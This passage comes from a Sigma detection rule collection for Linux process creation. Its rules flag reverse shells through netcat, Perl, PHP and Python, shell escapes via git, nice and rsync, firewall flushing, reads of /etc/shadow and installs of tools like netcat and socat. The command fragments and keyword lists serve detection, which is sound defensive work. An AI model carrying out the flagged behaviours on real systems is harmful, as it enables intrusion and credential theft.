'/bin/bash,-s' - '/bin/dash,-s' - '/bin/fish,-s' - '/bin/sh,-s' - '/bin/zsh,-s' condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_git_shell_execution.yml ================================================ title: Shell Execution via Git - Linux id: 47b3bbd4-1bf7-48cc-84ab-995362aaa75a status: test description: | Detects the use of the "git" utility to execute a shell. 
Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. references: - https://gtfobins.github.io/gtfobins/git/#shell author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) date: 2024-09-02 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: linux detection: selection: ParentImage|endswith: '/git' ParentCommandLine|contains|all: - ' -p ' - 'help' CommandLine|contains: - 'bash 0<&1' - 'dash 0<&1' - 'sh 0<&1' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml ================================================ title: OS Architecture Discovery Via Grep id: d27ab432-2199-483f-a297-03633c05bae6 status: test description: | Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo" references: - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-06-02 tags: - attack.discovery - attack.t1082 logsource: category: process_creation product: linux detection: selection_process: Image|endswith: '/grep' selection_architecture: CommandLine|endswith: - 'aarch64' - 'arm' - 'i386' - 'i686' - 'mips' - 'x86_64' condition: all of selection_* falsepositives: - Unknown level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_groupdel.yml ================================================ title: Group Has Been Deleted Via 
Groupdel id: 8a46f16c-8c4c-82d1-b121-0fdd3ba70a84 status: test description: Detects execution of the "groupdel" binary, which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks references: - https://linuxize.com/post/how-to-delete-group-in-linux/ - https://www.cyberciti.biz/faq/linux-remove-user-command/ - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/ - https://linux.die.net/man/8/groupdel author: Tuan Le (NCSGroup) date: 2022-12-26 tags: - attack.impact - attack.t1531 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/groupdel' condition: selection falsepositives: - Legitimate administrator activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml ================================================ title: Install Root Certificate id: 78a80655-a51e-4669-bc6b-e9d206a462ee status: test description: Detects installation of a new certificate on the system, which attackers may use to avoid warnings when connecting to attacker-controlled web servers or C2s references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md author: Ömer Günal, oscd.community date: 2020-10-05 modified: 2022-07-07 tags: - attack.defense-evasion - attack.t1553.004 logsource: product: linux category: process_creation detection: selection: Image|endswith: - '/update-ca-certificates' - '/update-ca-trust' condition: selection falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_install_suspicious_packages.yml ================================================ title: Suspicious Package Installed - Linux id: 700fb7e8-2981-401c-8430-be58e189e741 status: test description: Detects installation of suspicious packages using system 
installation utilities references: - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt author: Nasreddine Bencherchali (Nextron Systems) date: 2023-01-03 modified: 2026-01-01 tags: - attack.defense-evasion - attack.t1553.004 logsource: product: linux category: process_creation detection: selection_tool_apt: Image|endswith: - '/apt' - '/apt-get' CommandLine|contains: 'install' selection_tool_yum: Image|endswith: '/yum' CommandLine|contains: - 'localinstall' - 'install' selection_tool_rpm: Image|endswith: '/rpm' CommandLine|contains: '-i' selection_tool_dpkg: Image|endswith: '/dpkg' CommandLine|contains: - '--install' - '-i' selection_keyword: CommandLine|contains: # Add more suspicious packages - 'nmap' - ' nc' - 'netcat' - 'wireshark' - 'tshark' - 'openconnect' - 'proxychains' - 'socat' condition: 1 of selection_tool_* and selection_keyword falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml ================================================ title: Flush Iptables Ufw Chain id: 3be619f4-d9ec-4ea8-a173-18fdd01996ab status: test description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic references: - https://blogs.blackberry.com/ - https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-01-18 tags: - attack.defense-evasion - attack.t1562.004 logsource: product: linux category: process_creation detection: selection_img: Image|endswith: - '/iptables' - '/xtables-legacy-multi' - '/iptables-legacy-multi' - '/ip6tables' - '/ip6tables-legacy-multi' selection_params: CommandLine|contains: - '-F' - '-Z' - '-X' selection_ufw: CommandLine|contains: - 
'ufw-logging-deny' - 'ufw-logging-allow' - 'ufw6-logging-deny' - 'ufw6-logging-allow' # - 'ufw-reject-output' # - 'ufw-track-inputt' condition: all of selection_* falsepositives: - Network administrators level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_local_account.yml ================================================ title: Local System Accounts Discovery - Linux id: b45e3d6f-42c6-47d8-a478-df6bd6cf534c status: test description: Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md - https://my.f5.com/manage/s/article/K589 - https://man.freebsd.org/cgi/man.cgi?pwd_mkdb author: Alejandro Ortuno, oscd.community, CheraghiMilad date: 2020-10-08 modified: 2024-12-10 tags: - attack.discovery - attack.t1087.001 logsource: category: process_creation product: linux detection: selection_1: Image|endswith: '/lastlog' selection_2: CommandLine|contains: '''x:0:''' selection_3: Image|endswith: - '/cat' - '/ed' - '/head' - '/more' - '/nano' - '/tail' - '/vi' - '/vim' - '/less' - '/emacs' - '/sqlite3' - '/makemap' CommandLine|contains: - '/etc/passwd' - '/etc/shadow' - '/etc/sudoers' - '/etc/spwd.db' - '/etc/pwd.db' - '/etc/master.passwd' selection_4: Image|endswith: '/id' selection_5: Image|endswith: '/lsof' CommandLine|contains: '-u' condition: 1 of selection* falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_local_groups.yml ================================================ title: Local Groups Discovery - Linux id: 676381a6-15ca-4d73-a9c8-6a22e970b90d status: test description: Detects enumeration of local system groups. 
Adversaries may attempt to find local system groups and permission settings references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md author: Ömer Günal, Alejandro Ortuno, oscd.community date: 2020-10-11 modified: 2025-06-04 tags: - attack.discovery - attack.t1069.001 logsource: category: process_creation product: linux detection: selection_1: Image|endswith: '/groups' selection_2: Image|endswith: - '/cat' - '/ed' - '/head' - '/less' - '/more' - '/nano' - '/tail' - '/vi' - '/vim' CommandLine|contains: '/etc/group' condition: 1 of selection_* falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml ================================================ title: Potential GobRAT File Discovery Via Grep id: e34cfa0c-0a50-4210-9cb3-5632d08eb041 status: test description: Detects the use of grep to discover specific files created by the GobRAT malware references: - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-06-02 tags: - attack.discovery - attack.t1082 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/grep' CommandLine|contains: - 'apached' - 'frpc' - 'sshd.sh' - 'zone.arm' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml ================================================ title: Named Pipe Created Via Mkfifo id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4 status: test description: Detects the 
creation of a new named pipe using the "mkfifo" utility references: - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally author: Nasreddine Bencherchali (Nextron Systems) date: 2023-06-16 tags: - attack.execution logsource: category: process_creation product: linux detection: selection: Image|endswith: '/mkfifo' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml ================================================ title: Potentially Suspicious Named Pipe Created Via Mkfifo id: 999c3b12-0a8c-40b6-8e13-dd7d62b75c7a related: - id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4 type: derived status: test description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location references: - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally author: Nasreddine Bencherchali (Nextron Systems) date: 2023-06-16 tags: - attack.execution logsource: category: process_creation product: linux detection: selection: Image|endswith: '/mkfifo' # Note: Add more potentially suspicious locations CommandLine|contains: ' /tmp/' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml ================================================ title: Mount Execution With Hidepid Parameter id: ec52985a-d024-41e3-8ff6-14169039a0b3 status: test description: Detects execution of the "mount" command with the "hidepid" parameter, which hides processes from other users on the system references: - https://blogs.blackberry.com/ - https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/ - 
https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-01-12 tags: - attack.credential-access - attack.defense-evasion - attack.t1564 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/mount' CommandLine|contains|all: - 'hidepid=2' - ' -o ' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml ================================================ title: Potential Netcat Reverse Shell Execution id: 7f734ed0-4f47-46c0-837f-6ee62505abd9 status: test description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup. references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ - https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ - https://www.infosecademy.com/netcat-reverse-shells/ - https://man7.org/linux/man-pages/man1/ncat.1.html author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)' date: 2023-04-07 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: linux detection: selection_nc: Image|endswith: - '/nc' - '/ncat' selection_flags: CommandLine|contains: - ' -c ' - ' -e ' selection_shell: CommandLine|contains: - ' ash' - ' bash' - ' bsh' - ' csh' - ' ksh' - ' pdksh' - ' sh' - ' tcsh' - '/bin/ash' - '/bin/bash' - '/bin/bsh' - '/bin/csh' - '/bin/ksh' - '/bin/pdksh' - '/bin/sh' - '/bin/tcsh' - '/bin/zsh' - '$IFSash' - '$IFSbash' - '$IFSbsh' - '$IFScsh' - '$IFSksh' - '$IFSpdksh' - '$IFSsh' - '$IFStcsh' - '$IFSzsh' condition: all of selection_* falsepositives: - Unlikely level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_nice_shell_execution.yml 
================================================ title: Shell Execution via Nice - Linux id: 093d68c7-762a-42f4-9f46-95e79142571a status: test description: | Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. references: - https://gtfobins.github.io/gtfobins/nice/#shell - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) date: 2024-09-02 tags: - attack.discovery - attack.t1083 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/nice' CommandLine|endswith: - '/bin/bash' - '/bin/dash' - '/bin/fish' - '/bin/sh' - '/bin/zsh' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_nohup.yml ================================================ title: Nohup Execution id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2 status: test description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments references: - https://gtfobins.github.io/gtfobins/nohup/ - https://en.wikipedia.org/wiki/Nohup - https://www.computerhope.com/unix/unohup.htm author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' date: 2022-06-06 tags: - attack.execution - attack.t1059.004 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/nohup' condition: selection falsepositives: - Administrators or installed processes that leverage nohup level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml ================================================ title: Suspicious Nohup Execution id: 
457df417-8b9d-4912-85f3-9dbda39c3645 related: - id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2 type: derived status: test description: Detects execution of binaries located in potentially suspicious locations via "nohup" references: - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-06-02 tags: - attack.execution logsource: product: linux category: process_creation detection: selection: Image|endswith: '/nohup' CommandLine|contains: '/tmp/' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml ================================================ title: OMIGOD SCX RunAsProvider ExecuteScript id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db status: test description: | Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. 
references: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://github.com/Azure/Azure-Sentinel/pull/3059 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC date: 2021-10-15 modified: 2022-10-05 tags: - attack.privilege-escalation - attack.initial-access - attack.execution - attack.t1068 - attack.t1190 - attack.t1203 logsource: product: linux category: process_creation detection: selection: User: root LogonId: 0 CurrentDirectory: '/var/opt/microsoft/scx/tmp' CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx' condition: selection falsepositives: - Legitimate use of SCX RunAsProvider ExecuteScript. level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml ================================================ title: OMIGOD SCX RunAsProvider ExecuteShellCommand id: 21541900-27a9-4454-9c4c-3f0a4240344a status: test description: | Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. references: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://github.com/Azure/Azure-Sentinel/pull/3059 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC date: 2021-10-15 modified: 2022-10-05 tags: - attack.privilege-escalation - attack.initial-access - attack.execution - attack.t1068 - attack.t1190 - attack.t1203 logsource: product: linux category: process_creation detection: selection: User: root LogonId: 0 CurrentDirectory: '/var/opt/microsoft/scx/tmp' CommandLine|contains: '/bin/sh' condition: selection falsepositives: - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. 
level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml ================================================ title: Potential Perl Reverse Shell Execution id: 259df6bc-003f-4306-9f54-4ff1a08fa38e status: test description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)' date: 2023-04-07 tags: - attack.execution logsource: category: process_creation product: linux detection: selection_img: Image|endswith: '/perl' CommandLine|contains: ' -e ' selection_content: - CommandLine|contains|all: - 'fdopen(' - '::Socket::INET' - CommandLine|contains|all: - 'Socket' - 'connect' - 'open' - 'exec' condition: all of selection_* falsepositives: - Unlikely level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml ================================================ title: Potential PHP Reverse Shell id: c6714a24-d7d5-4283-a36b-3ffd091d5f7e status: test description: | Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection. 
references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ author: '@d4ns4n_' date: 2023-04-07 tags: - attack.execution logsource: category: process_creation product: linux detection: selection: Image|contains: '/php' CommandLine|contains|all: - ' -r ' - 'fsockopen' CommandLine|contains: - 'ash' - 'bash' - 'bsh' - 'csh' - 'ksh' - 'pdksh' - 'sh' - 'tcsh' - 'zsh' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_pnscan_binary_cli_pattern.yml ================================================ title: Pnscan Binary Data Transmission Activity id: 97de11cd-4b67-4abf-9a8b-1020e670aa9e status: test description: | Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT author: David Burkett (@signalblur) date: 2024-04-16 references: - https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence - https://intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf - https://regex101.com/r/RugQYK/1 - https://www.virustotal.com/gui/file/beddf70a7bab805f0c0b69ac0989db6755949f9f68525c08cb874988353f78a9/content tags: - attack.discovery - attack.t1046 logsource: category: process_creation product: linux detection: selection: CommandLine|re: -(W|R)\s?(\s|"|')([0-9a-fA-F]{2}\s?){2,20}(\s|"|') condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml ================================================ title: Connection Proxy id: 72f4ab3f-787d-495d-a55d-68c2ff46cf4c status: test 
description: Detects setting proxy configuration author: Ömer Günal date: 2020-06-17 modified: 2022-10-05 tags: - attack.defense-evasion - attack.command-and-control - attack.t1090 logsource: product: linux category: process_creation detection: selection: CommandLine|contains: - 'http_proxy=' - 'https_proxy=' condition: selection falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_pua_trufflehog.yml ================================================ title: PUA - TruffleHog Execution - Linux id: d7a650c4-226c-451e-948f-cc490db506aa related: - id: 44030449-b0df-4c94-aae1-502359ab28ee type: similar status: experimental description: | Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intended for use in CI pipelines and security assessments, It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information. references: - https://github.com/trufflesecurity/trufflehog - https://www.getsafety.com/blog-posts/shai-hulud-npm-attack author: Swachchhanda Shrawan Poudel (Nextron Systems) date: 2025-09-24 tags: - attack.discovery - attack.credential-access - attack.t1083 - attack.t1552.001 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: '/trufflehog' selection_cli_platform: CommandLine|contains: - ' docker --image ' - ' Git ' - ' GitHub ' - ' Jira ' - ' Slack ' - ' Confluence ' - ' SharePoint ' - ' s3 ' - ' gcs ' selection_cli_verified: CommandLine|contains: ' --results=verified' condition: selection_img or all of selection_cli_* falsepositives: - Legitimate use of TruffleHog by security teams or developers. 
level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_python_http_server_execution.yml ================================================ title: Python WebServer Execution - Linux id: 3f0f5957-04f8-4792-ad89-192b0303bde6 status: experimental description: | Detects the execution of Python web servers via command line interface (CLI). After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software. This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems. references: - https://www.atomicredteam.io/atomic-red-team/atomics/T1048.003#atomic-test-8---python3-httpserver - https://docs.python.org/3/library/http.server.html - https://docs.python.org/2/library/simplehttpserver.html author: Mohamed LAKRI date: 2025-10-17 tags: - attack.exfiltration - attack.t1048.003 logsource: product: linux category: process_creation detection: selection_img: - Image|endswith: - '/python' - '/python2' - '/python3' - Image|contains: - '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink - '/python3.' selection_module: CommandLine|contains: - 'http.server' - 'SimpleHTTPServer' condition: all of selection_* falsepositives: - Testing or development activity level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml ================================================ title: Python Spawning Pretty TTY Via PTY Module id: c4042d54-110d-45dd-a0e1-05c47822c937 related: - id: 32e62bc7-3de0-4bb1-90af-532978fe42c0 type: similar status: test description: | Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity. 
references: - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ author: Nextron Systems date: 2022-06-03 modified: 2024-11-04 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: linux detection: selection_img: - Image|endswith: - '/python' - '/python2' - '/python3' - Image|contains: - '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink - '/python3.' selection_cli_import: CommandLine|contains: - 'import pty' - 'from pty ' selection_cli_spawn: CommandLine|contains: 'spawn' condition: all of selection_* falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml ================================================ title: Python Reverse Shell Execution Via PTY And Socket Modules id: 32e62bc7-3de0-4bb1-90af-532978fe42c0 related: - id: c4042d54-110d-45dd-a0e1-05c47822c937 type: similar status: test description: | Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell. 
references: - https://www.revshells.com/ author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)' date: 2023-04-24 modified: 2024-11-04 tags: - attack.execution logsource: category: process_creation product: linux detection: selection: Image|contains: 'python' CommandLine|contains|all: - ' -c ' - 'import' - 'pty' - 'socket' - 'spawn' - '.connect' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_python_shell_os_system.yml ================================================ title: Inline Python Execution - Spawn Shell Via OS System Library id: 2d2f44ff-4611-4778-a8fc-323a0e9850cc status: test description: | Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell. references: - https://gtfobins.github.io/gtfobins/python/#shell author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) date: 2024-09-02 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: linux detection: selection_img: - Image|endswith: - '/python' - '/python2' - '/python3' - Image|contains: - '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink - '/python3.' 
selection_cli: CommandLine|contains|all: - ' -c ' - 'os.system(' CommandLine|contains: - '/bin/bash' - '/bin/dash' - '/bin/fish' - '/bin/sh' - '/bin/zsh' condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml ================================================ title: Remote Access Tool - Team Viewer Session Started On Linux Host id: 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d related: - id: ab70c354-d9ac-4e11-bbb6-ec8e3b153357 type: similar - id: f459ccb4-9805-41ea-b5b2-55e279e2424a type: similar status: test description: | Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. references: - Internal Research author: Josh Nickels, Qi Nan date: 2024-03-11 tags: - attack.persistence - attack.initial-access - attack.t1133 logsource: category: process_creation product: linux detection: selection: ParentImage|endswith: '/TeamViewer_Service' Image|endswith: '/TeamViewer_Desktop' CommandLine|endswith: '/TeamViewer_Desktop --IPCport 5939 --Module 1' condition: selection falsepositives: - Legitimate usage of TeamViewer level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml ================================================ title: Linux Remote System Discovery id: 11063ec2-de63-4153-935e-b1a8b9e616f1 status: test description: Detects the enumeration of other remote systems. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md author: Alejandro Ortuno, oscd.community date: 2020-10-22 modified: 2021-11-27 tags: - attack.discovery - attack.t1018 logsource: category: process_creation product: linux detection: selection_1: Image|endswith: '/arp' CommandLine|contains: '-a' selection_2: Image|endswith: '/ping' CommandLine|contains: - ' 10.' # 10.0.0.0/8 - ' 192.168.' # 192.168.0.0/16 - ' 172.16.' # 172.16.0.0/12 - ' 172.17.' - ' 172.18.' - ' 172.19.' - ' 172.20.' - ' 172.21.' - ' 172.22.' - ' 172.23.' - ' 172.24.' - ' 172.25.' - ' 172.26.' - ' 172.27.' - ' 172.28.' - ' 172.29.' - ' 172.30.' - ' 172.31.' - ' 127.' # 127.0.0.0/8 - ' 169.254.' # 169.254.0.0/16 condition: 1 of selection* falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_remove_package.yml ================================================ title: Linux Package Uninstall id: 95d61234-7f56-465c-6f2d-b562c6fedbc4 status: test description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg". 
references: - https://sysdig.com/blog/mitre-defense-evasion-falco - https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command - https://linuxhint.com/uninstall_yum_package/ - https://linuxhint.com/uninstall-debian-packages/ author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems) date: 2023-03-09 tags: - attack.defense-evasion - attack.t1070 logsource: product: linux category: process_creation detection: selection_yum: Image|endswith: '/yum' CommandLine|contains: - 'erase' - 'remove' selection_apt: Image|endswith: - '/apt' - '/apt-get' CommandLine|contains: - 'remove' - 'purge' selection_dpkg: Image|endswith: '/dpkg' CommandLine|contains: - '--remove ' - ' -r ' selection_rpm: Image|endswith: '/rpm' CommandLine|contains: ' -e ' condition: 1 of selection_* falsepositives: - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting). level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_rsync_shell_execution.yml ================================================ title: Shell Execution via Rsync - Linux id: e2326866-609f-4015-aea9-7ec634e8aa04 status: experimental description: | Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. 
references: - https://gtfobins.github.io/gtfobins/rsync/#shell author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth date: 2024-09-02 modified: 2025-01-18 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: - '/rsync' - '/rsyncd' CommandLine|contains: ' -e ' selection_cli: CommandLine|contains: - '/ash ' - '/bash ' - '/dash ' - '/csh ' - '/sh ' - '/zsh ' - '/tcsh ' - '/ksh ' - "'ash " - "'bash " - "'dash " - "'csh " - "'sh " - "'zsh " - "'tcsh " - "'ksh " condition: all of selection_* falsepositives: - Legitimate cases in which "rsync" is used to execute a shell level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml ================================================ title: Suspicious Invocation of Shell via Rsync id: 297241f3-8108-4b3a-8c15-2dda9f844594 status: experimental description: | Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. 
